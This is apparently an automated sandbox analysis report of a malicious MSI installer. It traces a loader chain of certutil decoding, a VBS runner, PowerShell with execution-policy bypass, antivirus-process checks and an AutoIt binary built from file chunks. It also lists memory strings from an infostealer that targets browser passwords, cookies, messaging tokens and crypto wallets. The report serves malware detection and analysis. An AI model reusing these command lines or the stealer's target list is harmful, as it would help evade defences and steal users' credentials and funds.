            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: Corrections.com, 0000001A.00000003.2335230386.0000000000E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5056Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4714Jump to behavior
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1E4.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI619D.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI614E.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF01.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAE63.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI60C0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF50.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAFB0.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1A5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIAF80.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comDropped PE file which has not been started: C:\ProgramData\37QQIEKNGVAA\QQ9RQQJump to dropped file
            Source: C:\Windows\Installer\MSI64FB.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-35497
            Source: C:\Windows\Installer\MSI64FB.tmpAPI coverage: 6.0 %
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comAPI coverage: 3.7 %
            Source: C:\Windows\System32\msiexec.exe TID: 7520Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7632Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F93FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF749F93FC4
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406301 FindFirstFileW,FindClose,16_2_00406301
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FADC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_00FAE472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_00FBA570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB66DC FindFirstFileW,FindNextFileW,FindClose,26_2_00FB66DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F7C622 FindFirstFileExW,26_2_00F7C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_00FB73D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB7333 FindFirstFileW,FindClose,26_2_00FB7333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FAD921
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F45FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,26_2_00F45FC8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\628056
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
            Source: powershell.exe, 00000009.00000002.2118502891.0000017A75C90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs error object that encapsulates what is in CIM_Error as well as includes error code, errorCategory, errorMessage and errorType.ailure of a CIM Operation. Instances of this type MAY be included as part of the response to a CIM Operation.a/
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVM
            Source: powershell.exe, 00000009.00000002.2122203319.0000017A76161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW v
            Source: powershell.exe, 00000009.00000002.2122203319.0000017A761A8000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3002616459.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3003785800.000001DA23A43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3003737459.000001DA23A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3005719464.000001DA2905A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 12.1960009dd8757fc4c7a65dceef295f6e0INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d 
%d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBF4FF BlockInput,26_2_00FBF4FF
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7DB38 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F7DB38
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F527B8 GetLastError,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF749F527B8
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F65058 mov eax, dword ptr fs:[00000030h]26_2_00F65058
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F421E0 GetProcessHeap,4_2_00007FF749F421E0
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI64FB.tmp "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat"Jump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7DB38 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F7DB38
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78CE8 SetUnhandledExceptionFilter,4_2_00007FF749F78CE8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78B00 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF749F78B00
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F78104 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF749F78104
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F72992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00F72992
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00F60BAF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60D45 SetUnhandledExceptionFilter,26_2_00F60D45
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F60F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00F60F91

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,26_2_00FA1B4D
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F472B0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetProcessId,AllowSetForegroundWindow,GetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,AttachThreadInput,WaitForSingleObject,GetExitCodeProcess,4_2_00007FF749F472B0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FABBED SendInput,keybd_event,26_2_00FABBED
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAECD0 mouse_event,26_2_00FAECD0
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs"Jump to behavior
            Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\putt.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 628056
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Cleared" Penalties
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Corrections.com u
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,26_2_00FA14AE
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,26_2_00FA1FB0
            Source: Corrections.com, 0000001A.00000000.2134912772.0000000001003000.00000002.00000001.01000000.0000000D.sdmp, Appeals.16.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Corrections.comBinary or memory string: Shell_TrayWnd
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F9CB40 cpuid 4_2_00007FF749F9CB40
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF749F97BB4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF749F52C64
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F97F18
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F97FE8
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF749F98080
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,4_2_00007FF749F90EE4
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F91430
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF749F98428
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F984DC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoW,4_2_00007FF749F982D0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: GetLocaleInfoEx,4_2_00007FF749F775BC
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF749F98620
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Installer\MSI64FB.tmp Code function: 4_2_00007FF749F78D5C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF749F78D5C
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00F9E652 GetUserNameW,26_2_00F9E652
            Source: C:\Windows\Installer\MSI64FB.tmp Code function: 4_2_00007FF749F91CAC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF749F91CAC
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,16_2_00406831
            Source: C:\Windows\System32\cscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: Yara match File source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: Corrections.com PID: 7808, type: MEMORYSTR
            Source: Corrections.com, 0000001A.00000002.3001813425.00000000009D0000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: us\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia 